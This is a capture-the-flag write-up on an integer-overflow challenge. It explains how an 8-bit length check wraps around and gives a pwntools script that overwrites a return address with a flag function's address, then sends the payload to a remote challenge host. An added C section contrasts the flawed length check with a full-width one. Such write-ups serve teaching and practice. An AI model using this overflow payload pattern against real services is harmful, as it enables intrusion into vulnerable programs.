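How integer overflow works
Anything beyond the storage length is simply discarded.
pwn int_overflow
0x14 + 0x4 bytes, plus the 4-byte return address, plus 234 characters (or 235 and so on, as long as the final character count falls between 3+256 and 8+256) gives 262 characters, which passes the if check.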
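import pwn
# Value written over the saved return address
flag_addr = 0x0804868B
# 0x14 + 0x4 filler bytes, the 4-byte return address, then 234 padding bytes = 262 bytes
payload = b'x' * (0x14 + 0x4) + pwn.p32(flag_addr) + b'x' * 234
r = pwn.remote("220.249.52.133", 44711)
# pwntools on Python 3 expects bytes for both the delimiter and the data
r.sendlineafter(b"Your choice:", b"1")
r.sendlineafter(b"your username:", b"a")
r.recvuntil(b"your passwd:")
r.sendline(payload)
r.interactive()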
Note: on Kali, run it with the command python3 a.py
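The truncation described above, as an added C example that is not part of the original post: the weak length check next to a full-width one, so a 262-character input passes the first and fails the second. It assumes the length is narrowed to 8 bits (consistent with the 256 offsets in the text) and that the accepted window is 3 to 8 inclusive; all function names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MIN_LEN 3   /* assumed bounds, from the 3..8 window in the text */
#define MAX_LEN 8

/* Weak form: the length is narrowed to 8 bits before the range check,
 * so only (len mod 256) is compared. */
int check_len_truncating(size_t len)
{
    uint8_t short_len = (uint8_t)len;   /* high bits are discarded here */
    return short_len >= MIN_LEN && short_len <= MAX_LEN;
}

/* Hardened form: compare the full-width length, never a narrowed copy. */
int check_len_full_width(size_t len)
{
    return len >= MIN_LEN && len <= MAX_LEN;
}

/* Hardened copy: validate the real length, then copy exactly that much. */
int copy_passwd_safe(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (!check_len_full_width(len) || len >= dst_size)
        return -1;                      /* rejected: nothing is written */
    memcpy(dst, src, len + 1);          /* includes the terminating NUL */
    return 0;
}

int main(void)
{
    size_t samples[] = { 6, 262, 300 }; /* constructed sample lengths */
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("len=%zu truncated=%u weak=%d strict=%d\n", samples[i],
               (unsigned)(uint8_t)samples[i],
               check_len_truncating(samples[i]),
               check_len_full_width(samples[i]));
    return 0;
}
```

Compiling with -Wconversion makes GCC and Clang warn about an implicit narrowing of this kind.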